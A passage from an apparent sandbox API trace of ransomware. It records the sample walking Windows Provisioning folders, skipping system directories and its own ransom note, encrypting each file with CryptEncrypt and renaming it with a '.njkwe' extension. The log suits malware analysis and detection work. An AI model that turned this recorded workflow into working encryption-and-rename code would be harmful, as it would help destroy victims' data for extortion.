pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*") returned 82 [0074.475] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0074.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.476] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.476] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.476] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\.") returned 82 [0074.476] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.476] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.476] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.476] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.476] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.476] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.476] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.476] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\..") returned 83 [0074.476] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.476] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.476] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x540f90a7, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x540f90a7, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x540f90a7, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xcb9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0074.476] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0074.476] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0074.476] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0074.476] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0074.476] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0074.476] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml") returned 99 [0074.476] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0074.476] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.476] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0074.477] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.478] GetTickCount () returned 0x1152f88 [0074.478] GetTickCount () returned 0x1152f88 [0074.478] GetTickCount () returned 0x1152f88 [0074.478] GetTickCount () returned 0x1152f88 [0074.478] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.478] GetProcessHeap () returned 0xbe0000 [0074.478] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.478] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0xcb9, lpOverlapped=0x0) returned 1 [0074.479] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff347, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.479] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0xcb9, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0xcb9, lpOverlapped=0x0) returned 1 [0074.480] GetProcessHeap () returned 0xbe0000 [0074.480] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.480] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.480] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.480] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.480] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.480] CloseHandle (hObject=0x434) returned 1 [0074.480] GetProcessHeap () returned 0xbe0000 [0074.480] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.480] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0074.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.481] GetProcessHeap () returned 0xbe0000 [0074.481] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.481] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5408696e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5408696e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5408696e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0074.481] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0074.481] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0074.481] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0074.481] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0074.481] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0074.481] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml") returned 100 [0074.481] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0074.481] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.481] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0074.481] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.481] GetTickCount () returned 0x1152f88 [0074.481] GetTickCount () returned 0x1152f88 [0074.481] GetTickCount () returned 0x1152f88 [0074.481] GetTickCount () returned 0x1152f88 [0074.481] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.482] GetProcessHeap () returned 0xbe0000 [0074.482] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.482] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.483] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.483] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.483] GetProcessHeap () returned 0xbe0000 [0074.483] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.483] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.483] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.484] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.484] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.484] CloseHandle (hObject=0x434) returned 1 [0074.484] GetProcessHeap () returned 0xbe0000 [0074.484] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.484] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0074.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.485] GetProcessHeap () returned 0xbe0000 [0074.485] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.485] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0074.485] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0074.485] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0074.485] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0074.485] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0074.485] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0074.485] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov") returned 85 [0074.485] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0074.485] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0074.485] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.485] GetProcessHeap () returned 0xbe0000 [0074.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.485] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*") returned 87 [0074.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0074.485] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.485] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.485] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.485] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.486] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.486] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\.") returned 87 [0074.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.486] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.486] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.486] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.486] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.486] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.486] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.486] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\..") returned 88 [0074.486] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.486] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0074.486] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0074.486] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0074.486] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0074.486] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0074.486] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0074.486] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime") returned 93 [0074.486] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0074.486] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0074.486] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.486] GetProcessHeap () returned 0xbe0000 [0074.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.486] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*") returned 95 [0074.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0074.486] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.486] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.486] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.487] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.487] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\.") returned 95 [0074.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.487] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.487] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\..") returned 96 [0074.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.487] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54060701, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x54060701, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x54060701, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 1 [0074.487] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0074.487] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0074.487] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0074.487] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0074.487] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0074.487] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0074.487] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0074.487] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.487] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0074.487] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.487] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0074.533] GetTickCount () returned 0x1152fc7 [0074.533] GetTickCount () returned 0x1152fc7 [0074.533] GetTickCount () returned 0x1152fc7 [0074.533] GetTickCount () returned 0x1152fc7 [0074.533] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0074.533] GetProcessHeap () returned 0xbe0000 [0074.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0074.533] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0xcdd, lpOverlapped=0x0) returned 1 [0074.535] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff323, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.535] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0xcdd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, 